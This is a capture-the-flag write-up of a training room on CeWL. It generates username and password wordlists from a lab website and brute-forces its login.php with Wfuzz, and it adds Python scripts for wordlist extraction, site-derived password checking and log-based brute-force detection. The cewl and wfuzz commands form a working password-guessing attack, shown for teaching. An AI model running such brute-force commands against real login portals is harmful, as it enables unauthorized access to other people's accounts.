Day 4
This room is a simple introduction to the Linux tool CeWL. CeWL (pronounced "cool") is a custom word list generator tool that spiders websites to create word lists based on the site's content.
Learning Objectives
What is CeWL?
What are the capabilities of CeWL?
How can we leverage CeWL to generate a custom wordlist from a website?
How can we customise the tool's output for specific tasks?
The room is a very straightforward introduction to the tool with all the commands given.
CeWL is a wordlist generator that is unique compared to other tools available. While many tools rely on pre-defined lists or common dictionary attacks, CeWL creates custom wordlists based on web page content.
We start by making a basic wordlist from the website and writing it to a file.
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cewl http://10.10.126.196 -w output.txt
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
The contents of the file are a word list as follows.
└─$ cat output.txt
Start
End
and
the
AntarctiCrafts
our
Stylesheet
.
.
.
Visit
office
Send
Message
Login
Submit
CeWL provides a lot of options that allow you to tailor the wordlist to your needs:
Specify spidering depth: The -d option allows you to set how deep CeWL should spider. For example, to spider two links deep: cewl http://machine_ip -d 2 -w output1.txt
Set minimum and maximum word length: Use the -m and -x options respectively. For instance, to get words between 5 and 10 characters: cewl http://machine_ip -m 5 -x 10 -w output2.txt
Handle authentication: If the target site is behind a login, you can use the -a flag for form-based authentication.
Custom extensions: The --with-numbers option will append numbers to words, and using --extension allows you to append custom extensions to each word, making it useful for directory or file brute-forcing.
Follow external links: By default, CeWL doesn't spider external sites, but using the --offsite option allows you to do so.
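To make the mechanics behind those options concrete, here is a small CeWL-style extractor written for this write-up (it is not CeWL's own code and not part of the room). It spiders a constructed three-page site held in memory, honours a depth limit, minimum/maximum word length and lowercasing, ignores script and style bodies, and stays on the starting host unless told otherwise. The last function turns the same list around for the defender: it checks whether a candidate password is just a word from the organisation's public site with digits bolted on, which is exactly the kind of password this room's workflow recovers. The site content, URLs and the derived_from_site helper are all assumptions made up for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed stand-in for a small website: URL -> HTML body.
# The links between pages are what lets the depth option do anything.
SITE = {
    "http://example.test/": """<html><body>
        <h1>AntarctiCrafts</h1>
        <p>Welcome to our Antarctic workshop. Visit the office or send a message.</p>
        <a href="/team.php">Meet the team</a>
        <a href="http://other.test/partners">Partners</a>
        <script>var secret = "notAWord";</script>
        </body></html>""",
    "http://example.test/team.php": """<html><body>
        <h2>Team Members</h2>
        <p>Officer McHappy leads the Frostbite division since 2019.</p>
        <a href="/links.php">Links</a>
        </body></html>""",
    "http://example.test/links.php": """<html><body>
        <p>All rights reserved. Stylesheet credits.</p>
        </body></html>""",
}


class TextAndLinks(HTMLParser):
    """Collect visible text and href targets, skipping script/style bodies."""

    def __init__(self):
        super().__init__()
        self.text, self.links, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.text.append(data)


def fetch(url):
    # Offline stand-in for an HTTP GET; unknown pages return None.
    return SITE.get(url)


def spider(start, depth=0, offsite=False):
    """Breadth-first crawl up to `depth` link hops, yielding each page's visible text."""
    seen, frontier = {start}, [(start, 0)]
    while frontier:
        url, d = frontier.pop(0)
        body = fetch(url)
        if body is None:
            continue
        page = TextAndLinks()
        page.feed(body)
        yield " ".join(page.text)
        if d >= depth:  # mirrors -d: do not follow links past the limit
            continue
        for href in page.links:
            nxt = urljoin(url, href)
            same_host = urlparse(nxt).netloc == urlparse(start).netloc
            if nxt not in seen and (offsite or same_host):  # mirrors --offsite
                seen.add(nxt)
                frontier.append((nxt, d + 1))


def build_wordlist(start, depth=0, min_len=3, max_len=None, lowercase=False, offsite=False):
    """CeWL-style list: alphabetic words in first-seen order, filtered by -m/-x style bounds."""
    words = []
    for text in spider(start, depth, offsite):
        for w in re.findall(r"[A-Za-z]+", text):
            if len(w) < min_len or (max_len and len(w) > max_len):
                continue
            w = w.lower() if lowercase else w
            if w not in words:
                words.append(w)
    return words


def derived_from_site(candidate, wordlist):
    """Defensive check (hypothetical helper): is the password a site word plus trailing digits?"""
    stem = re.sub(r"\d+$", "", candidate).lower()
    return stem in {w.lower() for w in wordlist}


if __name__ == "__main__":
    words = build_wordlist("http://example.test/", depth=2, min_len=5, lowercase=True)
    print("\n".join(words))
    print("Frostbite2019 derived from site:", derived_from_site("Frostbite2019", words))
```

Running it with depth=0 yields only the front page's words; depth=2 reaches team.php and links.php but never other.test, because offsite stays False. A password filter built on derived_from_site is cheap to run at account creation or reset time and removes precisely the guesses a CeWL-generated list would make.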
For this room we need to gain access to the portal located at http://machine_ip/login.php.

We first create a username and password list based on the website.
Username List:
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cewl -d 0 -m 5 -w usernames.txt http://10.10.126.196/team.php --lowercase
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cat usernames.txt
antarcticrafts
stylesheet
start
members
officer
.
.
.
links
rights
reserved
Password List:
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cewl -d 2 -m 5 -w passwords.txt http://10.10.126.196 --with-numbers
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cat passwords.txt
Start
AntarctiCrafts
Stylesheet
About
.
.
.
Message
Login
Submit
Now we can attempt to brute force the login page with Wfuzz.
Wfuzz is a tool designed for brute-forcing web applications. It can be used to find resources that are not linked (directories, servlets, scripts, etc.), brute-force GET and POST parameters to check for different kinds of injection (SQL, XSS, LDAP), brute-force form parameters (user/password), and perform general fuzzing.
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://10.10.126.196/login.php -d "username=FUZZ&password=FUZ2Z"
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.126.196/login.php
Total requests: 9361
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000006317: 302 118 L 297 W 4442 Ch "[REDACTED] - [REDACTED]"
Total time: 0
Processed Requests: 9361
Filtered Requests: 9360
Requests/sec.: 0
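Seen from the server side, a run like the one above is loud: 9361 POST requests to /login.php from one address in a short time, almost all answered with the same 200 page, and a lone 302 when the right pair lands. The following detector, added for this write-up (not part of the room or of Wfuzz), parses combined-format access log lines and raises an alert for any source IP that exceeds a threshold of login POSTs inside a sliding time window, reporting how many of those attempts were redirected. The log lines are constructed in sample_log(); the addresses, timestamps and user agent in them are made up for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse(line):
    """Return the fields of one access log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect_login_bruteforce(lines, path="/login.php",
                            window=timedelta(seconds=60), threshold=20):
    """Alert on source IPs with at least `threshold` POSTs to `path` within any `window`."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec["method"] == "POST" and rec["path"] == path:
            by_ip[rec["ip"]].append(rec)

    alerts = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        peak, start = 0, 0
        # Sliding window: advance `start` until the window fits, track the peak count.
        for end, rec in enumerate(recs):
            while rec["ts"] - recs[start]["ts"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[ip] = {
                "peak_per_window": peak,
                "total": len(recs),
                # A 302 amid a wall of 200s is the success the attacker was waiting for.
                "successes": sum(1 for r in recs if r["status"] == 302),
                "first": recs[0]["ts"].isoformat(),
                "last": recs[-1]["ts"].isoformat(),
            }
    return alerts


def sample_log():
    """Constructed sample: one host hammering the form, one ordinary user."""
    base = datetime(2023, 12, 4, 10, 0, 0, tzinfo=timezone.utc)

    def line(ip, offset, method, path, status):
        ts = (base + timedelta(seconds=offset)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 4442 "-" "Wfuzz/3.1.0"'

    lines = [
        line("10.0.0.9", 0, "GET", "/login.php", 200),
        line("10.0.0.9", 5, "POST", "/login.php", 200),   # one typo, then success
        line("10.0.0.9", 12, "POST", "/login.php", 302),
    ]
    lines += [line("10.0.0.5", i, "POST", "/login.php", 200) for i in range(45)]
    lines.append(line("10.0.0.5", 45, "POST", "/login.php", 302))  # the hit
    return lines


if __name__ == "__main__":
    for ip, info in detect_login_bruteforce(sample_log()).items():
        print(ip, info)
```

The threshold and window are deliberately parameters: a public portal with many users needs a higher bar than an admin page, and a single 302 following dozens of identical-size 200 responses from one address is the signal worth paging on, since it marks a credential that now needs rotating.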
We now have our username and password. We can proceed to login to the portal.

We can see this is a mailbox and the flag can be found here.